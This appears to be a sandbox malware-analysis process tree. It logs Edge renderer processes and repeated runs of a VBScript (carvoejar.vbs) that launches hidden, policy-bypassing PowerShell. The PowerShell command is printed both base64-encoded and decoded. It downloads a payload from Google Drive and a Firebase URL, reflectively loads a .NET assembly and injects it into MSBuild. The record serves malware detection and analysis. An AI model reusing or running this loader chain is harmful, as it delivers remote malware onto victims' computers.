  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=97 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:1
  2⤵
  PID:3536
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=98 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3620 /prefetch:1
  2⤵
  PID:5844
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=99 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4504 /prefetch:1
  2⤵
  PID:3232
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=100 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3784 /prefetch:1
  2⤵
  PID:5736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=101 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9060 /prefetch:1
  2⤵
  PID:1196
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=102 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8392 /prefetch:1
  2⤵
  PID:5464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=103 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5808 /prefetch:1
  2⤵
  PID:2540
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=104 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5228 /prefetch:1
  2⤵
  PID:2824
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=105 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3620 /prefetch:1
  2⤵
  PID:1940

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:964

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:468

C:\Windows\system32\wscript.exe
wscript.exe C:\ProgramData\carvoejar.vbs
1⤵
- Blocklisted process makes network request
- Checks computer location settings
PID:3700
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgncnRraW1hZ2VVcmwgPSA0VjNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdScrJ2M/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVYnKydnSkonKydKdjFGNnZTNHNVJysnT3libkgtc0R2VWhCWXd1cjRWMztydGt3ZWJDbGllbnQgPSBOZXctJysnT2JqZWN0IFMnKyd5c3RlbS5OZXQuV2ViQ2xpZW50O3J0a2ltYWdlQnl0ZXMgPSBydGt3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXQnKydhKHJ0a2ltYWdlVXJsKTtydGtpbWFnZVRleHQgPSBbU3lzJysndGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhydGtpbWFnZUJ5dGVzKTtydGtzdGFyJysndEZsYWcgPSA0VjM8PCcrJ0JBU0U2NF9TVEFSVD4+NFYzO3J0a2VuZEZsYWcgPSA0VjM8PEJBU0U2NF9FTkQ+PjRWMztydGtzdGFydEknKyduZGV4ID0gcnRrJysnaW1hZ2VUZXh0LkluZGV4T2YocnRrc3RhcnRGbGFnKTtydGtlbmRJbmRleCA9IHJ0a2ltYWdlVGV4dC5JbmRleE9mKHJ0a2UnKyduZEZsYWcpO3J0a3N0YScrJ3J0SW5kJysnZXggLWdlIDAgLWFuZCBydGtlbmRJbmRleCAtZ3QgcnRrc3RhcnRJbmRleDtydGtzJysndGFydEluZGV4ICs9IHJ0a3N0YXJ0RmxhJysnZy5MZW5ndGg7cnRrYmFzZTY0TGVuZ3RoID0gcnRrZW5kSW5kZXggLSBydGtzdGFydEluZGV4O3J0a2Jhc2U2NENvbW1hbmQgPSBydGtpbWFnZVRleHQuU3Vic3RyaW5nKCcrJ3J0a3N0YXJ0SW5kZXgsIHJ0a2Jhc2U2NExlbmd0aCcrJyk7cnRrYmFzJysnZTY0UmV2ZXJzZWQgPSAtam9pbiAocnRrJysnYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFJCViAnKydGJysnb3JFYWNoLU9iamVjdCB7IHJ0a18gfSlbLTEuLi0ocnRrYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtydGtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHInKyd0a2Jhc2U2NFJldmVyc2VkKTtydGtsb2FkZScrJ2RBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5BJysnc3NlbWJseV06OkxvJysnYWQocnRrY29tbWFuZEJ5dGVzKTtydGt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDRWM1ZBSTRWMyk7cnRrdmFpTWV0aG9kLkludm9rZShydGtudWxsLCAnKydAKDRWMzcyNWVhY2JkNTFmMScrJy0wNjliLTA2NTQtYTlhNC1hM2Y4MjFjMD1uZWtvdCZhaWRlbT10bGE/dHh0LlRJVFNFVC9vL21vYy50b3BzcHBhLmIxMGFlLW9pbS1vdGNlJysneW9ycC9iLzB2L21vYy5zaXBhZWxnb29nLmVnYXJvdHNlc2FiZXJpZi8vOnNwdHRoNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VicrJzNkZXNhdCcrJ2l2YWRvNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VjNNU0J1aWxkNFYzJysnLCA0VjNkZXNhdGl2YWQnKydvNFYzLDRWM2Rlc2F0aXZhZG80VjMsNFYnKyczZGVzYXRpdmFkJysnbzRWMyw0VicrJzNVUkw0VjMsIDRWM0M6Ym0nKydXUHJvZ3JhbURhdGFiJysnbVc0VjMsNFYzY2Fydm9lamFyNFYzLDRWM3ZiczRWMyw0JysnVjMxNFYzLDRWMzE0VjMpKTsnKS1jUmVwTEFjRSAgJ3J0aycsW0NIYXJdMzYgIC1SZVBMQUNFKFtDSGFyXTgyK1tDSGFyXTY2K1tDSGFyXTg2KSxbQ0hhcl0xMjQgLVJlUExBQ0UgKFtDSGFyXTUyK1tDSGFyXTg2K1tDSGFyXTUxKSxbQ0hhcl0zOS1jUmVwTEFjRSAgKFtDSGFyXTk4K1tDSGFyXTEwOStbQ0hhcl04NyksW0NIYXJdOTIpIHwgJiAoIChbc1RSSW5HXSR2ZXJCT1NFUFJFRmVyRW5jZSlbMSwzXSsneCctam9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5544
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('rtkimageUrl = 4V3https://drive.google.com/u'+'c?export=download&id=1AIV'+'gJJ'+'Jv1F6vS4sU'+'OybnH-sDvUhBYwur4V3;rtkwebClient = New-'+'Object S'+'ystem.Net.WebClient;rtkimageBytes = rtkwebClient.Do'+'wnloadDat'+'a(rtkimageUrl);rtkimageText = [Sys'+'tem.Text.Encoding]::UTF8.GetString(rtkimageBytes);rtkstar'+'tFlag = 4V3<<'+'BASE64_START>>4V3;rtkendFlag = 4V3<<BASE64_END>>4V3;rtkstartI'+'ndex = rtk'+'imageText.IndexOf(rtkstartFlag);rtkendIndex = rtkimageText.IndexOf(rtke'+'ndFlag);rtksta'+'rtInd'+'ex -ge 0 -and rtkendIndex -gt rtkstartIndex;rtks'+'tartIndex += rtkstartFla'+'g.Length;rtkbase64Length = rtkendIndex - rtkstartIndex;rtkbase64Command = rtkimageText.Substring('+'rtkstartIndex, rtkbase64Length'+');rtkbas'+'e64Reversed = -join (rtk'+'base64Command.ToCharArray() RBV '+'F'+'orEach-Object { rtk_ })[-1..-(rtkbase64Command.Length)];rtkcommandBytes = [System.Convert]::FromBase64String(r'+'tkbase64Reversed);rtkloade'+'dAssembly = [System.Reflection.A'+'ssembly]::Lo'+'ad(rtkcommandBytes);rtkvaiMethod = [dnlib.IO.Home].GetMethod(4V3VAI4V3);rtkvaiMethod.Invoke(rtknull, '+'@(4V3725eacbd51f1'+'-069b-0654-a9a4-a3f821c0=nekot&aidem=tla?txt.TITSET/o/moc.topsppa.b10ae-oim-otce'+'yorp/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth4V3, 4V3desativado4V3, 4V'+'3desat'+'ivado4V3, 4V3desativado4V3, 4V3MSBuild4V3'+', 4V3desativad'+'o4V3,4V3desativado4V3,4V'+'3desativad'+'o4V3,4V'+'3URL4V3, 4V3C:bm'+'WProgramDatab'+'mW4V3,4V3carvoejar4V3,4V3vbs4V3,4'+'V314V3,4V314V3));')-cRepLAcE 'rtk',[CHar]36 -RePLACE([CHar]82+[CHar]66+[CHar]86),[CHar]124 -RePLACE ([CHar]52+[CHar]86+[CHar]51),[CHar]39-cRepLAcE ([CHar]98+[CHar]109+[CHar]87),[CHar]92) | & ( ([sTRInG]$verBOSEPREFerEnce)[1,3]+'x'-joiN'')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3780
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5196

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x514 0x508
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5840

C:\Windows\system32\wscript.exe
wscript.exe C:\ProgramData\carvoejar.vbs
1⤵
- Blocklisted process makes network request
- Checks computer location settings
PID:1484
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgncnRraW1hZ2VVcmwgPSA0VjNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdScrJ2M/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVYnKydnSkonKydKdjFGNnZTNHNVJysnT3libkgtc0R2VWhCWXd1cjRWMztydGt3ZWJDbGllbnQgPSBOZXctJysnT2JqZWN0IFMnKyd5c3RlbS5OZXQuV2ViQ2xpZW50O3J0a2ltYWdlQnl0ZXMgPSBydGt3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXQnKydhKHJ0a2ltYWdlVXJsKTtydGtpbWFnZVRleHQgPSBbU3lzJysndGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhydGtpbWFnZUJ5dGVzKTtydGtzdGFyJysndEZsYWcgPSA0VjM8PCcrJ0JBU0U2NF9TVEFSVD4+NFYzO3J0a2VuZEZsYWcgPSA0VjM8PEJBU0U2NF9FTkQ+PjRWMztydGtzdGFydEknKyduZGV4ID0gcnRrJysnaW1hZ2VUZXh0LkluZGV4T2YocnRrc3RhcnRGbGFnKTtydGtlbmRJbmRleCA9IHJ0a2ltYWdlVGV4dC5JbmRleE9mKHJ0a2UnKyduZEZsYWcpO3J0a3N0YScrJ3J0SW5kJysnZXggLWdlIDAgLWFuZCBydGtlbmRJbmRleCAtZ3QgcnRrc3RhcnRJbmRleDtydGtzJysndGFydEluZGV4ICs9IHJ0a3N0YXJ0RmxhJysnZy5MZW5ndGg7cnRrYmFzZTY0TGVuZ3RoID0gcnRrZW5kSW5kZXggLSBydGtzdGFydEluZGV4O3J0a2Jhc2U2NENvbW1hbmQgPSBydGtpbWFnZVRleHQuU3Vic3RyaW5nKCcrJ3J0a3N0YXJ0SW5kZXgsIHJ0a2Jhc2U2NExlbmd0aCcrJyk7cnRrYmFzJysnZTY0UmV2ZXJzZWQgPSAtam9pbiAocnRrJysnYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFJCViAnKydGJysnb3JFYWNoLU9iamVjdCB7IHJ0a18gfSlbLTEuLi0ocnRrYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtydGtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHInKyd0a2Jhc2U2NFJldmVyc2VkKTtydGtsb2FkZScrJ2RBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5BJysnc3NlbWJseV06OkxvJysnYWQocnRrY29tbWFuZEJ5dGVzKTtydGt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDRWM1ZBSTRWMyk7cnRrdmFpTWV0aG9kLkludm9rZShydGtudWxsLCAnKydAKDRWMzcyNWVhY2JkNTFmMScrJy0wNjliLTA2NTQtYTlhNC1hM2Y4MjFjMD1uZWtvdCZhaWRlbT10bGE/dHh0LlRJVFNFVC9vL21vYy50b3BzcHBhLmIxMGFlLW9pbS1vdGNlJysneW9ycC9iLzB2L21vYy5zaXBhZWxnb29nLmVnYXJvdHNlc2FiZXJpZi8vOnNwdHRoNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VicrJzNkZXNhdCcrJ2l2YWRvNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VjNNU0J1aWxkNFYzJysnLCA0VjNkZXNhdGl2YWQnKydvNFYzLDRWM2Rlc2F0aXZhZG80VjMsNFYnKyczZGVzYXRpdmFkJysnbzRWMyw0VicrJzNVUkw0VjMsIDRWM0M6Ym0nKydXUHJvZ3JhbURhdGFiJysnbVc0VjMsNFYzY2Fydm9lamFyNFYzLDRWM3ZiczRWMyw0JysnVjMxNFYzLDRWMzE0VjMpKTsnKS1jUmVwTEFjRSAgJ3J0aycsW0NIYXJdMzYgIC1SZVBMQUNFKFtDSGFyXTgyK1tDSGFyXTY2K1tDSGFyXTg2KSxbQ0hhcl0xMjQgLVJlUExBQ0UgKFtDSGFyXTUyK1tDSGFyXTg2K1tDSGFyXTUxKSxbQ0hhcl0zOS1jUmVwTEFjRSAgKFtDSGFyXTk4K1tDSGFyXTEwOStbQ0hhcl04NyksW0NIYXJdOTIpIHwgJiAoIChbc1RSSW5HXSR2ZXJCT1NFUFJFRmVyRW5jZSlbMSwzXSsneCctam9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3700
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('rtkimageUrl = 4V3https://drive.google.com/u'+'c?export=download&id=1AIV'+'gJJ'+'Jv1F6vS4sU'+'OybnH-sDvUhBYwur4V3;rtkwebClient = New-'+'Object S'+'ystem.Net.WebClient;rtkimageBytes = rtkwebClient.Do'+'wnloadDat'+'a(rtkimageUrl);rtkimageText = [Sys'+'tem.Text.Encoding]::UTF8.GetString(rtkimageBytes);rtkstar'+'tFlag = 4V3<<'+'BASE64_START>>4V3;rtkendFlag = 4V3<<BASE64_END>>4V3;rtkstartI'+'ndex = rtk'+'imageText.IndexOf(rtkstartFlag);rtkendIndex = rtkimageText.IndexOf(rtke'+'ndFlag);rtksta'+'rtInd'+'ex -ge 0 -and rtkendIndex -gt rtkstartIndex;rtks'+'tartIndex += rtkstartFla'+'g.Length;rtkbase64Length = rtkendIndex - rtkstartIndex;rtkbase64Command = rtkimageText.Substring('+'rtkstartIndex, rtkbase64Length'+');rtkbas'+'e64Reversed = -join (rtk'+'base64Command.ToCharArray() RBV '+'F'+'orEach-Object { rtk_ })[-1..-(rtkbase64Command.Length)];rtkcommandBytes = [System.Convert]::FromBase64String(r'+'tkbase64Reversed);rtkloade'+'dAssembly = [System.Reflection.A'+'ssembly]::Lo'+'ad(rtkcommandBytes);rtkvaiMethod = [dnlib.IO.Home].GetMethod(4V3VAI4V3);rtkvaiMethod.Invoke(rtknull, '+'@(4V3725eacbd51f1'+'-069b-0654-a9a4-a3f821c0=nekot&aidem=tla?txt.TITSET/o/moc.topsppa.b10ae-oim-otce'+'yorp/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth4V3, 4V3desativado4V3, 4V'+'3desat'+'ivado4V3, 4V3desativado4V3, 4V3MSBuild4V3'+', 4V3desativad'+'o4V3,4V3desativado4V3,4V'+'3desativad'+'o4V3,4V'+'3URL4V3, 4V3C:bm'+'WProgramDatab'+'mW4V3,4V3carvoejar4V3,4V3vbs4V3,4'+'V314V3,4V314V3));')-cRepLAcE 'rtk',[CHar]36 -RePLACE([CHar]82+[CHar]66+[CHar]86),[CHar]124 -RePLACE ([CHar]52+[CHar]86+[CHar]51),[CHar]39-cRepLAcE ([CHar]98+[CHar]109+[CHar]87),[CHar]92) | & ( ([sTRInG]$verBOSEPREFerEnce)[1,3]+'x'-joiN'')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3868
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2392

C:\Windows\system32\wscript.exe
wscript.exe C:\ProgramData\carvoejar.vbs
1⤵
- Blocklisted process makes network request
- Checks computer location settings
PID:4784
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgncnRraW1hZ2VVcmwgPSA0VjNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdScrJ2M/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVYnKydnSkonKydKdjFGNnZTNHNVJysnT3libkgtc0R2VWhCWXd1cjRWMztydGt3ZWJDbGllbnQgPSBOZXctJysnT2JqZWN0IFMnKyd5c3RlbS5OZXQuV2ViQ2xpZW50O3J0a2ltYWdlQnl0ZXMgPSBydGt3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXQnKydhKHJ0a2ltYWdlVXJsKTtydGtpbWFnZVRleHQgPSBbU3lzJysndGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhydGtpbWFnZUJ5dGVzKTtydGtzdGFyJysndEZsYWcgPSA0VjM8PCcrJ0JBU0U2NF9TVEFSVD4+NFYzO3J0a2VuZEZsYWcgPSA0VjM8PEJBU0U2NF9FTkQ+PjRWMztydGtzdGFydEknKyduZGV4ID0gcnRrJysnaW1hZ2VUZXh0LkluZGV4T2YocnRrc3RhcnRGbGFnKTtydGtlbmRJbmRleCA9IHJ0a2ltYWdlVGV4dC5JbmRleE9mKHJ0a2UnKyduZEZsYWcpO3J0a3N0YScrJ3J0SW5kJysnZXggLWdlIDAgLWFuZCBydGtlbmRJbmRleCAtZ3QgcnRrc3RhcnRJbmRleDtydGtzJysndGFydEluZGV4ICs9IHJ0a3N0YXJ0RmxhJysnZy5MZW5ndGg7cnRrYmFzZTY0TGVuZ3RoID0gcnRrZW5kSW5kZXggLSBydGtzdGFydEluZGV4O3J0a2Jhc2U2NENvbW1hbmQgPSBydGtpbWFnZVRleHQuU3Vic3RyaW5nKCcrJ3J0a3N0YXJ0SW5kZXgsIHJ0a2Jhc2U2NExlbmd0aCcrJyk7cnRrYmFzJysnZTY0UmV2ZXJzZWQgPSAtam9pbiAocnRrJysnYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFJCViAnKydGJysnb3JFYWNoLU9iamVjdCB7IHJ0a18gfSlbLTEuLi0ocnRrYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtydGtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHInKyd0a2Jhc2U2NFJldmVyc2VkKTtydGtsb2FkZScrJ2RBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5BJysnc3NlbWJseV06OkxvJysnYWQocnRrY29tbWFuZEJ5dGVzKTtydGt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDRWM1ZBSTRWMyk7cnRrdmFpTWV0aG9kLkludm9rZShydGtudWxsLCAnKydAKDRWMzcyNWVhY2JkNTFmMScrJy0wNjliLTA2NTQtYTlhNC1hM2Y4MjFjMD1uZWtvdCZhaWRlbT10bGE/dHh0LlRJVFNFVC9vL21vYy50b3BzcHBhLmIxMGFlLW9pbS1vdGNlJysneW9ycC9iLzB2L21vYy5zaXBhZWxnb29nLmVnYXJvdHNlc2FiZXJpZi8vOnNwdHRoNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VicrJzNkZXNhdCcrJ2l2YWRvNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VjNNU0J1aWxkNFYzJysnLCA0VjNkZXNhdGl2YWQnKydvNFYzLDRWM2Rlc2F0aXZhZG80VjMsNFYnKyczZGVzYXRpdmFkJysnbzRWMyw0VicrJzNVUkw0VjMsIDRWM0M6Ym0nKydXUHJvZ3JhbURhdGFiJysnbVc0VjMsNFYzY2Fydm9lamFyNFYzLDRWM3ZiczRWMyw0JysnVjMxNFYzLDRWMzE0VjMpKTsnKS1jUmVwTEFjRSAgJ3J0aycsW0NIYXJdMzYgIC1SZVBMQUNFKFtDSGFyXTgyK1tDSGFyXTY2K1tDSGFyXTg2KSxbQ0hhcl0xMjQgLVJlUExBQ0UgKFtDSGFyXTUyK1tDSGFyXTg2K1tDSGFyXTUxKSxbQ0hhcl0zOS1jUmVwTEFjRSAgKFtDSGFyXTk4K1tDSGFyXTEwOStbQ0hhcl04NyksW0NIYXJdOTIpIHwgJiAoIChbc1RSSW5HXSR2ZXJCT1NFUFJFRmVyRW5jZSlbMSwzXSsneCctam9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4436
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('rtkimageUrl = 4V3https://drive.google.com/u'+'c?export=download&id=1AIV'+'gJJ'+'Jv1F6vS4sU'+'OybnH-sDvUhBYwur4V3;rtkwebClient = New-'+'Object S'+'ystem.Net.WebClient;rtkimageBytes = rtkwebClient.Do'+'wnloadDat'+'a(rtkimageUrl);rtkimageText = [Sys'+'tem.Text.Encoding]::UTF8.GetString(rtkimageBytes);rtkstar'+'tFlag = 4V3<<'+'BASE64_START>>4V3;rtkendFlag = 4V3<<BASE64_END>>4V3;rtkstartI'+'ndex = rtk'+'imageText.IndexOf(rtkstartFlag);rtkendIndex = rtkimageText.IndexOf(rtke'+'ndFlag);rtksta'+'rtInd'+'ex -ge 0 -and rtkendIndex -gt rtkstartIndex;rtks'+'tartIndex += rtkstartFla'+'g.Length;rtkbase64Length = rtkendIndex - rtkstartIndex;rtkbase64Command = rtkimageText.Substring('+'rtkstartIndex, rtkbase64Length'+');rtkbas'+'e64Reversed = -join (rtk'+'base64Command.ToCharArray() RBV '+'F'+'orEach-Object { rtk_ })[-1..-(rtkbase64Command.Length)];rtkcommandBytes = [System.Convert]::FromBase64String(r'+'tkbase64Reversed);rtkloade'+'dAssembly = [System.Reflection.A'+'ssembly]::Lo'+'ad(rtkcommandBytes);rtkvaiMethod = [dnlib.IO.Home].GetMethod(4V3VAI4V3);rtkvaiMethod.Invoke(rtknull, '+'@(4V3725eacbd51f1'+'-069b-0654-a9a4-a3f821c0=nekot&aidem=tla?txt.TITSET/o/moc.topsppa.b10ae-oim-otce'+'yorp/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth4V3, 4V3desativado4V3, 4V'+'3desat'+'ivado4V3, 4V3desativado4V3, 4V3MSBuild4V3'+', 4V3desativad'+'o4V3,4V3desativado4V3,4V'+'3desativad'+'o4V3,4V'+'3URL4V3, 4V3C:bm'+'WProgramDatab'+'mW4V3,4V3carvoejar4V3,4V3vbs4V3,4'+'V314V3,4V314V3));')-cRepLAcE 'rtk',[CHar]36 -RePLACE([CHar]82+[CHar]66+[CHar]86),[CHar]124 -RePLACE ([CHar]52+[CHar]86+[CHar]51),[CHar]39-cRepLAcE ([CHar]98+[CHar]109+[CHar]87),[CHar]92) | & ( ([sTRInG]$verBOSEPREFerEnce)[1,3]+'x'-joiN'')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2744
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5500

C:\Windows\system32\wscript.exe
wscript.exe C:\ProgramData\carvoejar.vbs
1⤵
- Blocklisted process makes network request
- Checks computer location settings
PID:5604
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgncnRraW1hZ2VVcmwgPSA0VjNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdScrJ2M/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVYnKydnSkonKydKdjFGNnZTNHNVJysnT3libkgtc0R2VWhCWXd1cjRWMztydGt3ZWJDbGllbnQgPSBOZXctJysnT2JqZWN0IFMnKyd5c3RlbS5OZXQuV2ViQ2xpZW50O3J0a2ltYWdlQnl0ZXMgPSBydGt3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXQnKydhKHJ0a2ltYWdlVXJsKTtydGtpbWFnZVRleHQgPSBbU3lzJysndGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhydGtpbWFnZUJ5dGVzKTtydGtzdGFyJysndEZsYWcgPSA0VjM8PCcrJ0JBU0U2NF9TVEFSVD4+NFYzO3J0a2VuZEZsYWcgPSA0VjM8PEJBU0U2NF9FTkQ+PjRWMztydGtzdGFydEknKyduZGV4ID0gcnRrJysnaW1hZ2VUZXh0LkluZGV4T2YocnRrc3RhcnRGbGFnKTtydGtlbmRJbmRleCA9IHJ0a2ltYWdlVGV4dC5JbmRleE9mKHJ0a2UnKyduZEZsYWcpO3J0a3N0YScrJ3J0SW5kJysnZXggLWdlIDAgLWFuZCBydGtlbmRJbmRleCAtZ3QgcnRrc3RhcnRJbmRleDtydGtzJysndGFydEluZGV4ICs9IHJ0a3N0YXJ0R